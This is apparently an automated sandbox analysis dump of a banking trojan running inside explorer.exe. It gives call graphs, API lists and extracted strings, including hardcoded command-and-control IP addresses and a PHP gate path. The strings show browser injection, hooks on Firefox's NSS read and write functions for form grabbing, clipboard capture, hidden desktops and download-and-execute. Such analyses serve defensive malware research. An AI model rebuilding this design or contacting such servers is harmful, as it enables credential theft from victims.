c5b72c0 _DllMainCRTStartup 47 API calls 39198->39199 39199->39196 39199->39198 39201 c5b95e7 39200->39201 39202 c5bf344 39200->39202 39204 c5b72c0 39201->39204 39203 c5bf362 lstrlenA 39202->39203 39203->39201 39203->39203 39205 c5c5180 _cftoa_l 39204->39205 39206 c5b7303 6 API calls 39205->39206 39207 c5b73e0 lstrcatA WSAStartup 39206->39207 39208 c5b7386 39206->39208 39210 c5b78b5 39207->39210 39211 c5b7434 socket 39207->39211 39208->39207 39209 c5b738c lstrcatA wsprintfA lstrcatA lstrcatA 39208->39209 39209->39207 39214 c5b78bf free 39210->39214 39211->39210 39212 c5b7455 gethostbyname 39211->39212 39212->39210 39213 c5b7468 memcpy htons 39212->39213 39216 c5b74a5 _DllMainCRTStartup 39213->39216 39215 c5b78cb closesocket WSACleanup 39214->39215 39217 c5ce110 _cftoe2_l 4 API calls 39215->39217 39216->39210 39219 c5b74ae lstrlenA send 39216->39219 39218 c5b7914 39217->39218 39218->39191 39219->39210 39220 c5b74d9 39219->39220 39221 c5b74e2 send 39220->39221 39240 c5b74fa _cftoa_l 39220->39240 39221->39210 39221->39240 39222 c5b7540 recv 39222->39210 39222->39240 39223 c5b7925 39261 c5ce748 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind __report_securityfailure 39223->39261 39224 c5b75ca lstrlenA 39227 c5b7699 39224->39227 39228 c5b75e5 StrStrA 39224->39228 39225 c5b75a5 lstrcmpiA 39225->39210 39225->39240 39231 c5b76a2 39227->39231 39232 c5b784c 39227->39232 39233 c5b76b4 malloc 39227->39233 39230 c5b75fd lstrcmpiA 39228->39230 39228->39240 39229 c5b792a 39234 c5b7618 strtol 39230->39234 39235 c5b763e lstrcmpiA 39230->39235 39231->39210 39236 c5b76aa 39231->39236 39238 c5b789c malloc 39232->39238 39239 c5b7851 malloc 39232->39239 39237 c5b76f0 recv 39233->39237 39234->39210 39234->39240 39235->39240 39241 c5b7652 lstrcmpiA 39235->39241 39236->39233 39237->39214 39250 c5b7715 39237->39250 39238->39215 39242 c5b7870 recv 39239->39242 39240->39210 39240->39222 39240->39223 39240->39224 39240->39225 39241->39240 39242->39210 39243 c5b788d 39242->39243 39243->39242 39244 c5b7894 39243->39244 39244->39215 39245 c5b7830 39245->39214 39246 c5b791f 39260 c5ce748 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind __report_securityfailure 39246->39260 39247 c5b7746 strtol 39247->39214 39247->39250 39249 c5b7924 39249->39223 39250->39214 39250->39237 39250->39245 39250->39246 39250->39247 39251 c5b7835 39250->39251 39252 c5b779a realloc 39250->39252 39253 c5b77c0 recv 39250->39253 39254 c5b77ea recv 39250->39254 39251->39215 39252->39250 39253->39214 39253->39250 39254->39214 39254->39250 39256 c5befc6 _DllMainCRTStartup 39255->39256 39257 c5beffa wsprintfA 39256->39257 39258 c5ce110 _cftoe2_l 4 API calls 39257->39258 39259 c5bf02b 39258->39259 39259->39189 39260->39249 39261->39229 39263 c5c55e1 _cftoa_l 39262->39263 39268 c5c5546 _cftoa_l 39262->39268 39266 c5c52c0 _DllMainCRTStartup 61 API calls 39263->39266 39264 c5c560c 39265 c5ce110 _cftoe2_l 4 API calls 39264->39265 39267 c5c561c 39265->39267 39266->39264 39267->39169 39268->39264 39274 c5c52c0 39268->39274 39275 c5c5307 _cftoa_l 39274->39275 39276 c5c533e lstrlenA InternetCrackUrlA 39275->39276 39277 c5c54b2 39276->39277 39279 c5c5385 _cftoa_l 39276->39279 39278 c5ce110 _cftoe2_l 4 API calls 39277->39278 39280 c5c5506 39278->39280 39279->39277 39281 c5b72c0 _DllMainCRTStartup 47 API calls 39279->39281 39280->39264 39290 c5bf260 39280->39290 39285 c5c53cb _DllMainCRTStartup 39281->39285 39282 c5c54ea free 39282->39277 39283 c5c53ed PathFindFileNameA 39283->39282 39284 c5c5407 GetTempPathA GetTempFileNameA lstrcatA lstrcatA CreateFileA 39283->39284 39284->39282 39286 c5c5478 WriteFile 39284->39286 39285->39282 39285->39283 39287 c5c5499 free CloseHandle 39286->39287 39288 c5c54e1 CloseHandle 39286->39288 39287->39277 39289 c5c54b9 ShellExecuteA 39287->39289 39288->39282 39289->39277 39289->39288 39291 c5bef20 _DllMainCRTStartup 7 API calls 39290->39291 39292 c5bf2a2 8 API calls 39291->39292 39293 c5ce110 _cftoe2_l 4 API calls 39292->39293 39294 c5bf32b DeleteFileA CopyFileA SetFileAttributesA 39293->39294 39294->39264 39299 c5c762a _DllMainCRTStartup 39295->39299 39297 c5c7ce0 46 API calls 39297->39299 39298 c5b2c20 101 API calls _DllMainCRTStartup 39298->39299 39299->39297 39299->39298 39300 c5c7668 _DllMainCRTStartup 39299->39300 39304 c5c7b5b Sleep 39299->39304 39306 c5c7bb0 OpenClipboard 39299->39306 39300->39299 39301 c5b2c20 101 API calls _DllMainCRTStartup 39300->39301 39302 c5c7d50 46 API calls 39300->39302 39303 c5b1100 46 API calls _DllMainCRTStartup 39300->39303 39300->39304 39305 c5c7da0 7 API calls 39300->39305 39301->39300 39302->39300 39303->39300 39304->39299 39305->39300 39307 c5c7bcb GetClipboardData 39306->39307 39308 c5c7c24 39306->39308 39310 c5c7bfb CloseClipboard 39307->39310 39311 c5c7be1 GlobalLock 39307->39311 39318 c5b2c20 39308->39318 39310->39308 39314 c5c7c0b 39310->39314 39311->39310 39313 c5c7bef GlobalUnlock 39311->39313 39312 c5c7c33 39312->39299 39313->39310 39317 c5b1100 46 API calls _DllMainCRTStartup 39314->39317 39316 c5c7c16 39316->39299 39317->39316 39319 c5b2c3d Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 39318->39319 39322 c5b2080 39319->39322 39321 c5b2c74 39321->39312 39323 c5b20a9 _DllMainCRTStartup 39322->39323 39324 c5b20b2 _DllMainCRTStartup 39323->39324 39325 c5b2146 39323->39325 39328 c5b20ec 39324->39328 39329 c5b20d4 39324->39329 39339 c5b2040 46 API calls _DllMainCRTStartup 39325->39339 39338 c5b1e90 46 API calls _DllMainCRTStartup 39328->39338 39336 c5b23f0 101 API calls _DllMainCRTStartup 39329->39336 39332 c5b20dd 39337 c5b2370 101 API calls _DllMainCRTStartup 39332->39337 39334 c5b20ea 39335 c5b20f7 char_traits _DllMainCRTStartup 39334->39335 39335->39321 39336->39332 39337->39334 39338->39335

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$ByteCharMultiWide
                                                                                                                                                                                                  • String ID: $%s: *$Content-Length: $Content-Type: $Host: $Location: $Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3$ HTTP/1.1$.exe$/VzCAHn.php$185.81.68.147$185.81.68.148$:Zone.Identifier$Accept-Encoding$Advapi32.dll$ChildWindowFromPoint$CloseHandle$ConnectNamedPipe$Connection$Content-Length$Content-Length: $ConvertSidToStringSidA$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateDesktopA$CreateDirectoryA$CreateFileA$CreateMutexA$CreateNamedPipeA$CreateProcessA$CreateRemoteThread$CreateThread$CreateToolhelp32Snapshot$DeleteDC$DeleteFileA$DeleteObject$DisconnectNamedPipe$EnterCriticalSection$EnumWindows$ExitProcess$ExpandEnvironmentStringsA$FindFirstFileA$FindNextFileA$FindWindowA$Firefox$GET $GetComputerNameW$GetCurrentProcessId$GetDC$GetDIBits$GetDesktopWindow$GetFileSize$GetFileVersionInfoA$GetFileVersionInfoSizeA$GetInjects$GetLastError$GetMenuItemID$GetModuleFileNameA$GetModuleHandleA$GetModuleInformation$GetNativeSystemInfo$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetProcAddress$GetTempFileNameA$GetTempPathA$GetThreadContext$GetTopWindow$GetUserNameExA$GetUserNameW$GetVersionExA$GetVolumeInformationA$GetWindow$GetWindowLongA$GetWindowPlacement$GetWindowRect$GetWindowThreadProcessId$GetWindowsDirectoryA$HTTP/1.1 200 OK$Host: $HttpQueryInfoA$HttpQueryInfoW$InitializeCriticalSection$InternetCrackUrlA$IsWindowVisible$IsWow64Process$Kernel32.dll$KernelBase.dll$LeaveCriticalSection$LoadLibraryA$LocalAlloc$LocalFree$LookupAccountNameA$MenuItemFromPoint$MessageBoxA$MoveWindow$Mozilla$MultiByteToWideChar$NtCreateThreadEx$NtOpenKey$NtQueryInformationProcess$NtSetValueKey$NtUnmapViewOfSection$OpenDesktopA$OpenProcess$POST $PR_Read$PR_Write$PathFileExistsA$PathFindFileNameA$PathRemoveFileSpecA$PostMessageA$PrintWindow$Process32First$Process32Next$Psapi.dll$PtInRect$ReadFile$RealGetWindowClassA$RegCloseKey$RegOpenKeyExA$RegQueryValueExA$RegSetValueExA$ReleaseDC$ReleaseMutex$ResumeThread$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$SHAppBarMessage$SHFileOperationA$SHGetFolderPathA$ScreenToClient$Secur32.dll$SelectObject$SendMessageA$SetStretchBltMode$SetThreadContext$SetThreadDesktop$SetWindowLongA$Shell32.dll$ShellExecuteA$Shlwapi.dll$Sleep$StrChrA$StrStrA$StrStrIA$StrToIntA$StretchBlt$TerminateProcess$TerminateThread$Transfer-Encoding$User32.dll$VerQueryValueA$VirtualAllocEx$WSACleanup$WSAStartup$WaitForSingleObject$WideCharToMultiByte$WindowFromPoint$WriteFile$WriteProcessMemory$_errno$_strnicmp$bot|%s|%d|%d|%d|%d|%s|%s|%d|%d$chunked$close$closesocket$connect$firefox.exe$form|%s|%s|%d|$form|%s|%s|%s|%d|$free$gdi32.dll$gethostbyname$htons$http(s)://$identity$ioctlsocket$isdigit$isxdigit$lstrcatA$lstrcmpA$lstrcmpiA$lstrcpyA$lstrlenA$malloc$memcmp$memcpy$memset$msvcrt.dll$nss3.dll$ntdll.dll$ntohs$open$ping$realloc$recv$send$socket$strncmp$strtod$strtol$strtoul$text/html$tolower$version.dll$wininet.dll$ws2_32.dll$wsprintfA
                                                                                                                                                                                                  • API String ID: 2683923594-1492645186
                                                                                                                                                                                                  • Opcode ID: ceead7f360c4f281692bddcfe33997f30f89d30adece2fb155eca9e7e3fcff93
                                                                                                                                                                                                  • Instruction ID: ab75f8e6982d6651d9fddc5e4bc9e0e2df321884c8037295f379adeec0d45b5d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ceead7f360c4f281692bddcfe33997f30f89d30adece2fb155eca9e7e3fcff93
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89034B3C602F01C5FB499B52FC84B5A77A9F788B92F44537AC889433A5EF38A1D69740

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                  • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$taskmgr.exe$trusteer
                                                                                                                                                                                                  • API String ID: 3240663557-1393645298
                                                                                                                                                                                                  • Opcode ID: 50a01c9307c7bfdd2b4b94620e8dc5031bfd2fd73c2bbe0350eee02c3ac0f521
                                                                                                                                                                                                  • Instruction ID: c8a9dc98be87528eb0dc7883847f6387e3f18689b3b1ee25abae87f2580f9849
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50a01c9307c7bfdd2b4b94620e8dc5031bfd2fd73c2bbe0350eee02c3ac0f521
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAC19D3A704F4586EB54CF62EC5479A77A1F7C8B89F800225DE4D47A68DF78E289DB00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 69 c5b72c0-c5b7384 call c5c5180 lstrcpyA lstrcatA * 5 72 c5b73e0-c5b742e lstrcatA WSAStartup 69->72 73 c5b7386-c5b738a 69->73 75 c5b78b5 72->75 76 c5b7434-c5b744f socket 72->76 73->72 74 c5b738c-c5b73da lstrcatA wsprintfA lstrcatA * 2 73->74 74->72 77 c5b78bc 75->77 76->77 78 c5b7455-c5b7462 gethostbyname 76->78 80 c5b78bf-c5b78c5 free 77->80 78->77 79 c5b7468-c5b74a8 memcpy htons call c5f0858 78->79 79->77 86 c5b74ae-c5b74d3 lstrlenA send 79->86 82 c5b78cb-c5b791e closesocket WSACleanup call c5ce110 80->82 86->77 87 c5b74d9-c5b74e0 86->87 88 c5b74fa-c5b7531 call c5c5180 87->88 89 c5b74e2-c5b74f4 send 87->89 92 c5b7540-c5b755b recv 88->92 89->77 89->88 92->77 93 c5b7561-c5b7564 92->93 94 c5b767a-c5b7689 93->94 95 c5b756a-c5b7573 93->95 94->77 96 c5b768f-c5b7694 94->96 95->94 97 c5b7579-c5b7582 95->97 96->92 97->94 98 c5b7588-c5b758f 97->98 99 c5b7925-c5b792a call c5ce748 98->99 100 c5b7595-c5b75a3 98->100 101 c5b75ca-c5b75df lstrlenA 100->101 102 c5b75a5-c5b75bb lstrcmpiA 100->102 105 c5b7699-c5b76a0 101->105 106 c5b75e5-c5b75fb StrStrA 101->106 102->77 104 c5b75c1-c5b75c5 102->104 108 c5b7676 104->108 111 c5b76ac-c5b76ae 105->111 112 c5b76a2-c5b76a4 105->112 109 c5b75fd-c5b7616 lstrcmpiA 106->109 110 c5b7674 106->110 108->94 115 c5b7618-c5b7636 strtol 109->115 116 c5b763e-c5b7650 lstrcmpiA 109->116 110->108 113 c5b784c-c5b784f 111->113 114 c5b76b4-c5b76e8 malloc 111->114 112->77 117 c5b76aa 112->117 119 c5b789c-c5b78b3 malloc 113->119 120 c5b7851-c5b786c malloc 113->120 118 c5b76f0-c5b770f recv 114->118 115->77 121 c5b763c 115->121 116->110 122 c5b7652-c5b7670 lstrcmpiA 116->122 117->114 118->80 123 c5b7715-c5b7717 118->123 119->82 124 c5b7870-c5b788b recv 120->124 121->110 122->110 125 c5b781e-c5b7820 123->125 126 c5b771d-c5b7725 123->126 124->77 127 c5b788d-c5b7892 124->127 128 c5b7823-c5b782a 125->128 126->125 129 c5b772b-c5b7733 126->129 127->124 130 c5b7894-c5b789a 127->130 128->118 131 c5b7830 128->131 129->125 132 c5b7739-c5b7740 129->132 130->82 131->80 133 c5b791f-c5b7924 call c5ce748 132->133 134 c5b7746-c5b7778 strtol 132->134 133->99 134->80 136 c5b777e-c5b7780 134->136 136->80 138 c5b7786 136->138 139 c5b778c-c5b7798 138->139 140 c5b7835-c5b7847 138->140 141 c5b779a-c5b77ae realloc 139->141 142 c5b77b2-c5b77b8 139->142 140->82 141->142 143 c5b77c0-c5b77de recv 142->143 143->80 144 c5b77e4-c5b77e8 143->144 144->143 145 c5b77ea-c5b7803 recv 144->145 145->80 146 c5b7809-c5b781c 145->146 146->128
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4277384649-0
                                                                                                                                                                                                  • Opcode ID: 464e7a96b3fcba648b10796ae560bdce37aea7bf9e55c48050d3a5af52ca8332
                                                                                                                                                                                                  • Instruction ID: 3942cf54575b3ae326ac621e2f65371a0f9532d33ef2e825cb3503644d345b88
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 464e7a96b3fcba648b10796ae560bdce37aea7bf9e55c48050d3a5af52ca8332
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42F1D339301E85C6EB349F26EC447EA7BA1F788BC9F045229CA4A57B94DF38D185C750

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 0C5C5362
                                                                                                                                                                                                  • InternetCrackUrlA.WININET ref: 0C5C5377
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcpyA.KERNEL32 ref: 0C5B731E
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B732F
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B7343
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B7357
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B7368
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B737C
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B739A
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: wsprintfA.USER32 ref: 0C5B73B2
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B73C6
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B73DA
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B7416
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: WSAStartup.WS2_32 ref: 0C5B7426
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: socket.WS2_32 ref: 0C5B7442
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: gethostbyname.WS2_32 ref: 0C5B7459
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: memcpy.MSVCRT ref: 0C5B7479
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: htons.WS2_32 ref: 0C5B7488
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: connect.WS2_32 ref: 0C5B749F
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrlenA.KERNEL32 ref: 0C5B74B5
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: send.WS2_32 ref: 0C5B74CB
                                                                                                                                                                                                  • PathFindFileNameA.SHLWAPI ref: 0C5C53F1
                                                                                                                                                                                                  • GetTempPathA.KERNEL32 ref: 0C5C540F
                                                                                                                                                                                                  • GetTempFileNameA.KERNEL32 ref: 0C5C5425
                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0C5C5435
                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0C5C5441
                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0C5C546A
                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 0C5C548F
                                                                                                                                                                                                  • free.MSVCRT ref: 0C5C549E
                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0C5C54A7
                                                                                                                                                                                                  • ShellExecuteA.SHELL32 ref: 0C5C54D5
                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0C5C54E4
                                                                                                                                                                                                  • free.MSVCRT ref: 0C5C54EF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3619236930-0
                                                                                                                                                                                                  • Opcode ID: a668e62465058b6eac2f01fffd8541a1e6a56c3d9c826fa02c0f0837f1c26c0a
                                                                                                                                                                                                  • Instruction ID: bc25c541f270890cc2ceb739354717869498c809c860b0fd9e73692ad3362f42
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a668e62465058b6eac2f01fffd8541a1e6a56c3d9c826fa02c0f0837f1c26c0a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F851D63A701A408AFB24CFA6EC9479E77A0F788789F844129DE8907B58DF7CD185CB40

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetUserNameW.ADVAPI32 ref: 0C5C56E9
                                                                                                                                                                                                  • GetComputerNameW.KERNEL32 ref: 0C5C5703
                                                                                                                                                                                                    • Part of subcall function 0C5BF560: WideCharToMultiByte.KERNEL32 ref: 0C5BF5A3
                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32 ref: 0C5C572C
                                                                                                                                                                                                  • GetVersionExA.KERNEL32 ref: 0C5C573D
                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0C5C578D
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: EnterCriticalSection.KERNEL32 ref: 0C5B9498
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: RtlInitializeCriticalSection.NTDLL ref: 0C5B94A5
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: lstrcpyA.KERNEL32 ref: 0C5B94DA
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: lstrcpyA.KERNEL32 ref: 0C5B94FD
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: lstrcatA.KERNEL32 ref: 0C5B950D
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: lstrcatA.KERNEL32 ref: 0C5B951D
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: LeaveCriticalSection.KERNEL32 ref: 0C5B95A4
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: memcpy.MSVCRT ref: 0C5B95BC
                                                                                                                                                                                                    • Part of subcall function 0C5B9450: lstrlenA.KERNEL32 ref: 0C5B95CA
                                                                                                                                                                                                  • free.MSVCRT ref: 0C5C57A1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                  • String ID: 2.3
                                                                                                                                                                                                  • API String ID: 2800961625-1819902166
                                                                                                                                                                                                  • Opcode ID: 0cf1b661a9e572ba99184e872496b265aba7dcb0d01acf1847b2168f35ee4b3f
                                                                                                                                                                                                  • Instruction ID: fdc92f6b0b7712e225fe10a42216687e1c7aa500aa9c5027fba140253e143d12
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cf1b661a9e572ba99184e872496b265aba7dcb0d01acf1847b2168f35ee4b3f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11419236614A81DAE720DF61E8447DEB7A4FBC8788F844119EA4D47A58EFB8D249CB40

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 489 c5b88b0-c5b88dd call c5cc0bc 492 c5b88e3-c5b88fa call c5cc0d4 489->492 493 c5b89b6-c5b89cd call c5ce110 489->493 498 c5b89ad-c5b89b0 CloseHandle 492->498 499 c5b8900-c5b8905 492->499 498->493 500 c5b890b-c5b8915 GetCurrentProcessId 499->500 501 c5b8990-c5b89a7 Thread32Next 499->501 500->501 502 c5b8917-c5b8921 GetCurrentThreadId 500->502 501->498 501->499 502->501 503 c5b8923-c5b8929 502->503 504 c5b892b-c5b894d HeapAlloc 503->504 505 c5b8951-c5b8957 503->505 504->498 506 c5b894f 504->506 507 c5b8959-c5b8973 HeapReAlloc 505->507 508 c5b8980-c5b898d 505->508 506->508 507->498 509 c5b8975-c5b897d 507->509 508->501 509->508
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3234909527-0
                                                                                                                                                                                                  • Opcode ID: 9d30fba81285fdc59057156cb5b58ed11897abf2e752fcd5e8ecb8dbce55eb0b
                                                                                                                                                                                                  • Instruction ID: fb6f89a005feaa2e69f6b32b8a00eda69909a1e233300ad2894a57dd4a516c0c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d30fba81285fdc59057156cb5b58ed11897abf2e752fcd5e8ecb8dbce55eb0b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A31CF3A301A41C6EF24CF61E8503A9B7A5F788B98F089229CAAD07798DF3CD144CB41
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocVirtual$InfoSystem
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2622297391-0
                                                                                                                                                                                                  • Opcode ID: 5c5332db2e8d5770b661991db77c6a240e3aaf605af93bd03188a44620211507
                                                                                                                                                                                                  • Instruction ID: db99317f41520ddeac21758de57571d75f8206da55fc085151463387a784d8f2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c5332db2e8d5770b661991db77c6a240e3aaf605af93bd03188a44620211507
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16317C39306B4485EF159F12E4143AAAAA1F78CFC4F184639DE4D2BB18FF38D1818B50

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                  • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                  • API String ID: 936357808-3480109235
                                                                                                                                                                                                  • Opcode ID: f7cf14adc41ef2d6049861a487dbb5f7d1ae2d597757e346ce2c378721cb9d1f
                                                                                                                                                                                                  • Instruction ID: 5ccd4232f6cce00cd3d3c6464160045725904a75e360b2dca929e991af49d83d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7cf14adc41ef2d6049861a487dbb5f7d1ae2d597757e346ce2c378721cb9d1f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8419278300E06C6FB58EBA2EC91BDA67A5FBC4785F84022DC94A46294EF7CD1C9C751

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
